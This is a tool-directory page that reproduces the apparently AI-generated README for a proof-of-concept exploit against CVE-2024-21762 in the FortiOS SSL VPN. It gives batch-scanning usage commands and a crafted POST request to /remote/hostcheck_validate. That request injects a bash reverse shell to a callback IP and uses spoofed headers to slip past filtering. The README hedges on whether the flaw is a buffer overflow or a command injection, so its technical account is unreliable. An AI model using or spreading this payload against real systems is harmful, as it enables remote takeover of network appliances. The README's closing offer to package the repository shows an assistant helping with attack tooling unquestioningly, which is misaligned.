Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-21762_FortiNet_PoC — Proof-of-concept scanner targeting CVE-2024-21762 in FortiOS SSL VPN’s /remote/hostcheck_validate endpoint with reverse shell payload delivery. | Kitploit
Tools/GitHubGitHub/abrewer251/cve-2024-21762_fortinet_poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubabrewer251/cve-2024-21762_fortinet_poc

CVE-2024-21762_FortiNet_PoC

Proof-of-concept scanner targeting CVE-2024-21762 in FortiOS SSL VPN’s /remote/hostcheck_validate endpoint with reverse shell payload delivery.

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
View Repository
2121 year agoNot yet reviewed
Share

CVE-2024-21762_FortiNet_PoC

Proof-of-concept scanner targeting CVE-2024-21762 in FortiOS SSL VPN’s /remote/hostcheck_validate endpoint with reverse shell payload delivery.

Here’s a GitHub-style writeup for your project, including a clean and concise summary, a usage guide, and context on how it fits with the CVE.


🔥 Project Title: CVE-2024-21762 FortiOS HostCheck PoC Scanner

🧠 Summary (for GitHub description line):

Proof-of-concept scanner targeting CVE-2024-21762 in FortiOS SSL VPN’s /remote/hostcheck_validate endpoint with reverse shell payload delivery.


📜 Overview

This Python script is a PoC (Proof of Concept) tool designed to interact with Fortinet’s FortiOS SSL VPN interface, targeting CVE-2024-21762 — a stack-based buffer overflow or command injection vulnerability in the /remote/hostcheck_validate endpoint.

Disclaimer: This is for educational and authorized testing purposes only.


🧬 How It Works

  • Sends a crafted POST request to /remote/hostcheck_validate on a FortiGate SSL VPN interface.
  • Injects a bash reverse shell payload in a simulated vulnerable parameter (host).
  • Uses spoofed headers (User-Agent, Cookie) to bypass superficial FortiOS request filtering.
  • Receives and logs server responses to assess exploitation success.
  • Supports single or batch target testing with file input/output automation and progress bars.

🛠️ Features

  • 🧪 Reverse shell payload injection via controlled form field
  • 🧾 Full HTTP response capture for analysis (last_response.txt)
  • 📊 Progress bar for tracking in single/batch mode
  • 🗃️ Batch mode with input/output file support
  • 🔄 Modular and extendable

⚙️ Requirements

  • Python 3.6+
  • tqdm for progress visualization

Install dependencies:

root@kitploit:~
pip install tqdm

🚀 Usage

Single Target Mode

root@kitploit:~
python3 exploit.py --target 192.168.1.1:443 --callback-ip YOUR_IP --callback-port 8080

Batch Mode

root@kitploit:~
python3 exploit.py --input targets.txt --output results.txt --callback-ip YOUR_IP --callback-port 8080
  • targets.txt: List of targets in IP:PORT format, one per line
  • results.txt: Output log of exploit attempts

📥 Example Payload Sent

root@kitploit:~
POST /remote/hostcheck_validate HTTP/1.1
Host: [target]
User-Agent: FortiSSLVPNClient/6.4.0
Cookie: SVPNCOOKIE=AAAA
Content-Type: application/x-www-form-urlencoded

host=bash -c 'bash -i >& /dev/tcp/[callback-ip]/[callback-port] 0>&1'&...

🔍 Logs

The tool writes the full HTTP response of each attempt to:

root@kitploit:~
last_response.txt

Use this to verify if the request was parsed, rejected, or if an error code was returned.


⚠️ Legal

This code is provided for educational and authorized testing purposes only. Do not use this on networks or systems you do not own or have explicit permission to test.


✍️ Author

Carter — Cybersecurity Engineer, Red/Purple Team enthusiast, PoC automation nerd.


Would you like this packaged into a README.md file + repo structure ready to push to GitHub? I can generate that next.

Download Tool